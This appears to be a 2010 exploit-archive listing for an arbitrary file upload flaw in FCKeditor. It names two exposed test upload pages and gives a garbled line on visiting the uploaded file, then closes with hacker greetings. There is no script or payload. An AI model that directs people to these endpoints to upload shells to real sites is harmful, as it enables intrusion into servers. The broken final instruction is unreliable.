CMS (fckeditor) Remote Arbitrary File Upload Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CMS (fckeditor) Remote Arbitrary File Upload Exploit
# Published : 2010-04-16
# Author : Mr.MLL
# Previous Title : PHP RapidKill Pro 5.x Shell Upload Vulnerability
# Next Title : ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit

# Title: CMS (fckeditor) Remote Arbitrary File Upload Exploit


# Author: Mr.MLL
# Published: 2010-04-15
# Verified: yes
# Download Exploit Code
# Download N/A

==================================================================================================================


[o] CMS (fckeditor)

Software : fckeditor ( version all )
Vendor : http://ckeditor.com/
Contact : 7@live.com & Y-3@hotmail.com & te1@yahoo.com
Home : http://sec-r1z.com/


==================================================================================================================


[o] Exploit

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

http://localhost/[path]/FCKeditor/editor/filemanager/browser/default/test.html





[o] After the piece go to the path that will set you back after graduation


==================================================================================================================


[o] Greetz



muslims hacker & All My Friends


==================================================================================================================